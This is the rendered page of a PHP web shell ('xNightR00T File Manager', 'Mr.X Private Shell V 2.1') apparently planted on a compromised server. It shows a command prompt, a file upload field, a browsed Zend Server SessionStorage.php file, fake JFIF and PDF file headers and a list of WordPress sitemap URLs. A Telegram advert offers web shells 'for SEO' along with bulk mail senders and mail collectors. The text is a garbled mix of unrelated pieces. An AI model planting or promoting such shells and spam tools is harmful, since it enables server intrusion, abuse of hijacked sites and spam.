xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
<?php

namespace Zsd;

use \Zend\Session\SessionManager,
    \ZendServer\Exception;

class SessionStorage
{
    /**
     * @var string
     */
    const NS = 'ZEND_SERVER_ZSD';

    /**
     * @var SessionManager
     */
    private $manager = null;

    /**
     * @param string $timestamp
     */
    public function setZsdTimeStamp($timestamp)
    {
        $this->setValue('ZsdTimeStamp', $timestamp);
    }

    /**
     * @return string
     */
    public function getZsdTimeStamp()
    {
        return $this->getValue('ZsdTimeStamp');
    }

    /**
     * @param string $timestamp
     */
    public function setPhpTimeStamp($timestamp)
    {
        $this->setValue('PhpTimeStamp', $timestamp);
    }

    /**
     * @return string
     */
    public function getPhpTimeStamp()
    {
        return $this->getValue('PhpTimeStamp');
    }

    public function isExists()
    {
        return ($this->manager->getStorage()->offsetExists(self::NS) && !is_null($this->getStorage()));
    }

    public function clear()
    {
        $this->manager->getStorage()->clear(self::NS);
    }

    /**
     * @param string $key
     * @param string $value
     */
    private function setValue($key, $value)
    {
        $data       = $this->getStorage();
        $data[$key] = $value;
        $this->setData($data);
    }

    /**
     * @param string $key
     * @return string
     * @throws Exception
     */
    private function getValue($key)
    {
        $data = $this->getStorage();

        if (!isset($data[$key])) {
            return null;
        }

        return $data[$key];
    }

    /**
     * @param string $key
     * @return string
     * @throws Zwas_Exception
     */
    private function hasValue($key)
    {
        $data = $this->getStorage();

        return isset($data[$key]);
    }

    /**
     * @param array $data
     */
    private function setData($data)
    {
        $namespace                               = self::NS;
        $this->manager->getStorage()->$namespace = $data;
    }

    /**
     * @return array
     */
    public function getStorage()
    {
        $namespace = self::NS;
        $data      = isset($this->getManager()->getStorage()->$namespace) ? $this->getManager()->getStorage()->$namespace
                : null;

        if (!is_array($data)) {
            return array();
        }

        return $data;
    }

    /**
     * @return SessionManager
     */
    public function getManager()
    {
        if ($this->manager) return $this->manager;

        $this->manager = new SessionManager();
        $this->manager->start();
        return $this->manager;
    }

    /**
     * @param \Zend\Session\SessionManager $manager
     */
    public function setManager($manager)
    {
        $this->manager = $manager;
        return $this;
    }
}

Filemanager

Name Type Size Permission Actions
Controller Folder 0755
Db Folder 0755
View Folder 0755
SessionStorage.php File 2.75 KB 0644
ZsdHealthChecker.php File 5.04 KB 0644
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1
https://vn-gateway.com/en/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/en/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/wp-sitemap-posts-elementor_library-1.xmlhttps://vn-gateway.com/en/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/en/wp-sitemap-users-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-users-1.xml